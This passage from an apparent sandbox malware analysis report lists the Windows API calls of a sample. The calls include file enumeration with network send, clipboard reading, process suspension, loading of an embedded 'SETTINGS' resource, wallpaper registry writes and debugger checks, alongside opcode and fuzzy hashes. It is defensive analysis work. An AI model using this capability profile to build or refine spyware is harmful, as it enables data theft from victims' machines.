                                                                    • _wcschr.LIBVCRUNTIME ref: 00451E58
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                    • String ID: sJD
                                                                    • API String ID: 4212172061-3536923933
                                                                    • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                    • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                                    • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                    • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFind$FirstNextsend
                                                                    • String ID: (eF$XPG$XPG
                                                                    • API String ID: 4113138495-1496965907
                                                                    • Opcode ID: 1bbc29f072b44b0f7db1dcf308c33eb8b1789e73677766a08956dfd97b916e35
                                                                    • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                                    • Opcode Fuzzy Hash: 1bbc29f072b44b0f7db1dcf308c33eb8b1789e73677766a08956dfd97b916e35
                                                                    • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                                    APIs
                                                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                                                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                    • String ID: SETTINGS
                                                                    • API String ID: 3473537107-594951305
                                                                    • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                    • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                                    • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                    • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 0040966A
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstH_prologNext
                                                                    • String ID:
                                                                    • API String ID: 1157919129-0
                                                                    • Opcode ID: 3f47887ab8099ae94603f816ed56e19d8bc6a3de09b099e497bd72cece97293b
                                                                    • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                                    • Opcode Fuzzy Hash: 3f47887ab8099ae94603f816ed56e19d8bc6a3de09b099e497bd72cece97293b
                                                                    • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                      • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                      • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                                                                      • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                    • API String ID: 4127273184-3576401099
                                                                    • Opcode ID: f2c43ad2b54eca36b498e515dc1d07e136ae504e1b99f40133731ebf13c7e4dd
                                                                    • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                                    • Opcode Fuzzy Hash: f2c43ad2b54eca36b498e515dc1d07e136ae504e1b99f40133731ebf13c7e4dd
                                                                    • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                                    APIs
                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 2829624132-0
                                                                    • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                                    • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                                                    • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                                    • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                    • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                                    • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                    • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                    • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                    • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                    • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                    APIs
                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00759870), ref: 00433849
                                                                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                    • String ID:
                                                                    • API String ID: 1815803762-0
                                                                    • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                    • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                                    • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                    • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                                                    • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                                                    • ExitProcess.KERNEL32 ref: 004432EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                    • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                                                    • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                    • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                    • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                    • ExitProcess.KERNEL32 ref: 10004AEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                    • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                    • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                    • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                    APIs
                                                                    • OpenClipboard.USER32(00000000), ref: 0040B711
                                                                    • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                                                    • CloseClipboard.USER32 ref: 0040B725
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Clipboard$CloseDataOpen
                                                                    • String ID:
                                                                    • API String ID: 2058664381-0
                                                                    • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                    • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                                    • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                    • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
                                                                    • NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00415FFF,00000000), ref: 0041BB2A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CloseHandleOpenSuspend
                                                                    • String ID:
                                                                    • API String ID: 1999457699-0
                                                                    • Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                                    • Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
                                                                    • Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                                    • Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
                                                                    • NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00416024,00000000), ref: 0041BB56
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CloseHandleOpenResume
                                                                    • String ID:
                                                                    • API String ID: 3614150671-0
                                                                    • Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                                    • Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
                                                                    • Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                                    • Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID: MZ@
                                                                    • API String ID: 2325560087-2978689999
                                                                    • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                    • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                                    • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                    • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .
                                                                    • API String ID: 0-248832578
                                                                    • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                                    • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                                                    • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                                    • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                                                    Strings
                                                                    Memory Dump Source
